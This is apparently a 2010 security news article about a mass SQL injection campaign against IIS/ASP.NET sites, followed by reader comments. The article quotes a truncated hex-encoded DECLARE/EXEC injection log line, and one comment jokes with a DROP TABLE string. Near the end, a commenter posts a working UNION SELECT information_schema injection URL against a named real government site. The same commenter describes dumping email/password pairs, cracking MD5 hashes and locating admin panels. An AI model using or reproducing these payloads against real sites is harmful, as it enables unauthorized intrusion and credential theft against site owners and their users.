Mass SQL Injection Attack Hits Sites Running IIS

There’s a large-scale attack underway that is targeting Web servers running Microsoft’s IIS software, injecting the sites with a specific malicious script. The attack has compromised tens of thousands of sites already, experts say, and there’s no clear indication of who’s behind the campaign right now.

There’s a large-scale attack underway that is targeting Web servers running Microsoft’s IIS software, injecting the sites with a specific malicious script. The attack has compromised tens of thousands of sites already, experts say, and there’s no clear indication of who’s behind the campaign right now.

The attack, which researchers first noticed earlier this week, already has affected a few high-profile sites, including those belonging to The Wall Street Journal and The Jerusalem Post. Some analyses of the IIS attack suggest that it is directed at a third-party ad management script found on these sites.

The massive campaign is targeting servers running Microsoft IIS and ASP.net software. The attack appears to be a variation of the ever popular SQL injection, in which malicious hackers uses malformed commands in order to insert code on vulnerable Web sites. Once the site is compromised, the malicious code then attempts to compromise the machines of visitors to the site and install malware on their PCs, as well.

This is an extremely popular attack vector that has been in wide use by a variety of attackers for the last few years and has been very successful, thanks to the shoddy state of Web security.

In the current attack on IIS-based sites, the malicious code is attempting to redirect visitors to a specific site, which then installs malware on the victims’ machines. An analysis of the attack by Sucuri shows the details of the attack. Here’s what the original Web request looks like:

2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx
utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C6152652040742076……..
6F523B2D2D%20eXEc(@s)– 80 – 121.xx.xxx.xx HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) – –
www.website.com 200 0 0 32068 1685 0

Microsoft’s Jerry Bryant told Bob McMillan of the IDG News Service that the attack doesn’t exploit any vulnerability in IIS, but instead is an attack against third-party Web applications.

“The SQL injection attacks that allow the systems to be compromised are
occurring due to vulnerabilities in third-party web applications and do
not demonstrate vulnerabilities in Microsoft software,” Bryant told McMillan.

Estimates of the scope of the SQL injection attack have ranged from a few thousand compromised sites to more than 100,000 sites.

Suggested articles

Discussion

  • Dark Energy on

    So what 3rd party software does this script affect?  Who needs to be concerned about this?  What software do these newspapers run?

  • Anonymous on

    Dark Energy, SQL injection attacks can affect web sites that do not properly take in to account the possibility of SQL commands being injected in to the fields of a web site.  The third party being mentioned are the developer(s) of the sites affected.  

  • Anonymous2 on

    This isn't a generic random SQL injection spam attack, Anon. Looking at the address line of "utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;" it seems blatantly targeted to a very specific application. Dark's question is: What application?

  • Eddie on

    This is pretty easy to block with URLSCAN 3.1

    You can use the MaxAllowedContentLength, MaxUrl, and MaxQueryString settings and/or
    Drop anything with a Declare statement in it (not likely this is legit for most sites)

  • Anonymous on

    Looks like google analytics....

  • Anonymous on

    I've heard of this type of attack for many years. Why do programmers insist on writing SQL code which can be attacked in this way? Or is the code very old and unmaintained?
  • Anonymous on

    This has nothing to do with IIS, a SQL injection is a developer fault.

  • Anonymous on

    This is SQL injection, and you play it out as though it is a fault of IIS. If you actually knew anything about security you would know its just poorly written websites that are at fault. Without some level of competence, the average reader would deduce that "CRAPPY MS SOFTWARE FUHFUHFUH!"
  • Anonymous on

    This is SQL injection, and you play it out as though it is a fault of IIS. If you actually knew anything about security you would know its just poorly written websites that are at fault. Without some level of competence, the average reader would deduce that "CRAPPY MS SOFTWARE FUHFUHFUH!"
  • Anonymous on

    Comment'); DROP TABLE Comments; --I wonder if you sanitize your inputs on comments?
  • Anonymous ' on

    asdasda

  • Anonymous on

    Believe me, the MS software is still crappy!  SQL injection is stil a problem of coding though

  • Me on

    This is not a new attack. It is very old, and just being re-applied.  (And, it has nothing to do with Microsoft or IIS.  It's a fault of poor programming!) 

    The SQL Injection is rewriting your page's < title > tags and adding a javascript file which references the malicious unpacker code on a third party server.

    Big?  yes. Effective?  yes.  Stoppable?  Completely.  You need to clean your SQL before allowing it to be posted to the database.  Use Stored Procedures!

  • Josh from america on

    Ah, more windows users get burned, no suprise. This is another round of the darwin awards, wooo! Get em steve b, burn those customers lol.

  • Mark D. on

    Only poorly written MS SQL and Sybase applications are vulnerable to this particularly severe type of attack, due to the way both databases allow statements to be combined.  

    Poorly written applications for other databases are vulnerable to SQL injections as well (predicate modification mostly), but are not vulnerable to this type of attack, where an attacker can get the database to execute arbitrary SQL statements, because other databases do not allow SQL statements to be combined in the same willy nilly fashion.

  • Anonymous on

    Asprox worm style stupidity. Not new.
  • Anonymous on

    It is impossible to prevent sql injection attacks as long as web apps are coded improperly. Databases must be monitored as a second line of defense so intrusions can be detected and alarmed.  

  • Anonymous on

    Your headline names Microsoft IIS web server software even though this is completely unrelated to Microsoft or IIS. It's a vulnerability in code written by a 3rd party that runs on Microsoft platforms. It could just as easily been a script written to run on Apache.

    But I guess a headline naming the vulnerable 3rd party doesn't get as much clickthrough traffic. Good job throwing away any integrity you have. A++ Kudos. Much easier than writing good content.

     

    Kevin, you are my journalism HERO.

  • Anonymous on

    easy to really find out how many have been compromised, you just need to find the code of one containing the javascript that is fetching the malware, and then do a google search including key phrases. the results could astound you

  • MoMo on

    Perhaps the idea behind name dropping IIS is the idea that a good majority of the time IIS is running MSSQL.  With in mind -- who/whatever is pushing out these sql injections is going directly after MSSQL structure.  With that in mind, how many Apache servers run MS SQL.  So it's fair in thinking that because they are more-over targeting MSSQL ... therefore IIS ... therefore Microsoft ... therefore ... I'll stop there.  Just my two cents.

  • StareClips.com on

    By the way, for those saying that using stored procedures is "enough" to solve a SQL injection problem, keep in mind that more thought still needs to go into it.

    For instance, I have seen some stored procs which accept a varchar parameter which is a comma delimited list of numbers. Then, concatenates this parameter with a SQL statement (i.e., plugging the comma delimited list of numbers within a "WHERE IN (1,2,3)" statement)... and executes this with sp_executesql then this still allows a SQL injection problem even when stored procedures are used.

    So, much more thought than simply "use stored procs" needs to be applied. Just sayin'...

  • Buy Space Bag on

    Thanks for the great tips. I have been looking for something like this to help in my site building for ages.

     

  • Anonymous on

    It's sad how the name of IIS or MS SQL gets trown away by an articel like this one.

    Certanly when the subject is about SQL injection, which could be done in, well any SQL server.

    Hence the name 'SQL' injection, not IIS injection.

    IIS works fine, has a great interface.

    Apache works fine, has a simple interface (start/stop :P)

    Other webservers will work fine too, as long as people like the writer of this articel starts getting his followers by using correct titles and content.

  • Anonymous on

    i got all the tables from http://www.nlrc.gov.ng/aboutus.php?id=1 i typed this... http://www.nlrc.gov.ng/aboutus.php?id=1%20%20union%20select%201,2,3,4,5,6,concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20information_schema.tables obviously i could go further if i changed adminlogin/profiling to ascii code. and if the passwords are encrypted theres always using a md5 hash cracker. Also to make my life easier i have a program called InDirectory opened in win.rar and this program finds the admin login panel and the user's admin panel.

  • Anonymous on

    oh and i found out that users and the admin log in with email/password so at concat(table_name) i would type concat (email,password) this would give me the email and the password together to split the I would type a0x3 where the comma is...

  • marshaba7 on

    I don't want to say right now
  • victoriqx on

    I don't want to say right now

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.